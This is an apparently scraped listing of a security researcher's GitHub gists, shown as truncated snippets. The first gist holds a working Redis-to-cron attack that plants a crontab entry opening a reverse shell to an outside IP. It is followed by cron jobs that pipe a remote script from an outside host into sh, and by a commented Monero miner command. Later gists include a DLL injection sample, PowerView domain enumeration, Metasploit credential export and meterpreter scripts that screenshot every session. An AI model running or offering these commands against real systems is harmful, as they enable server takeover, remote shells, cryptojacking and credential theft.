Chris Gates carnal0wnage

redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
from https://phpinfo.me/2016/07/07/1275.html
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0623 | sh" > /var/spool/cron/crontabs/root
# ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr &
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
carnal0wnage / export_workspaces.rb
Last active November 11, 2016 20:56
Export a list of workspaces from metasploit databases and credentials
<ruby>
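# Read one workspace name per line and export each workspace as XML and pwdump.
File.open("/root/workspaces.txt", "r") do |f|
  f.each_line do |line|
    name = line.chomp # drop the trailing newline so it does not end up in the command or file name
    next if name.empty?
    run_single("workspace #{name}")
    run_single("db_export -f xml -a /root/msf_workspace_export/#{name}_export_13Aug2016.xml")
    run_single("db_export -f pwdump -a /root/msf_workspace_export/#{name}_export_13Aug2016.pwdump")
  end
end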
</ruby>
carnal0wnage / python_email.py
Created June 21, 2016 16:47 — forked from srv89/python_email.py
Python code for sending HTML email (Attachment + Multiple Recipients )
__author__ = 'srv'
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
username = '' # Email address to send from
password = '' # Password
server = smtplib.SMTP('')
carnal0wnage / 00readme.md
Created June 4, 2016 03:34 — forked from indrora/00readme.md
DeadUpdate: Kickin' it bigtime.
                             From the vendor that brought you a
                        vulnerable cloud storage platform comes
                        
           ___              ____  __        __     __ 
          / _ \___ ___ ____/ / / / /__  ___/ /__ _/ /____ 
         / // / -_) _ `/ _  / /_/ / _ \/ _  / _ `/ __/ -_)
        /____/\__/\_,_/\_,_/\____/ .__/\_,_/\_,_/\__/\__/ 
         Because popping SYSTEM /_/ is easy when you trust HTTP

Or, "How I learned to stop worrying and

carnal0wnage / dll_injection.py
Created May 22, 2016 02:03 — forked from RobinDavid/dll_injection.py
Sample DLL injection (Gray Hat Python)
import sys
from ctypes import *
PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
kernel32 = windll.kernel32 #Get the wanted dll
pid = sys.argv[1] #Gather sent parameters
carnal0wnage / PowerView-2.0-tricks.ps1
Created March 19, 2016 22:26 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
carnal0wnage / gist:7d068511b8b287942eec
Created February 27, 2016 23:06
snippet for blog
msf post(execute) > sessions -s checkvm
[*] Session 5 (13.37.1.11):
[*] Running script checkvm on meterpreter session 5 (13.37.1.11)
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
[*] Session 6 (13.37.1.11):
[*] Running script checkvm on meterpreter session 6 (13.37.1.11)
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
[*] Session 7 (13.37.5.10):
carnal0wnage / gist:cbe3a4ab1c78d7fbe096
Created February 27, 2016 15:05
snippet for blog post
msf > sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
carnal0wnage / run_meterp_screenshot.rb
Created February 27, 2016 15:02
run the screenshot command against all active sessions
<ruby>
framework.sessions.each do |session|
  session.run_cmd("screenshot")
end
</ruby>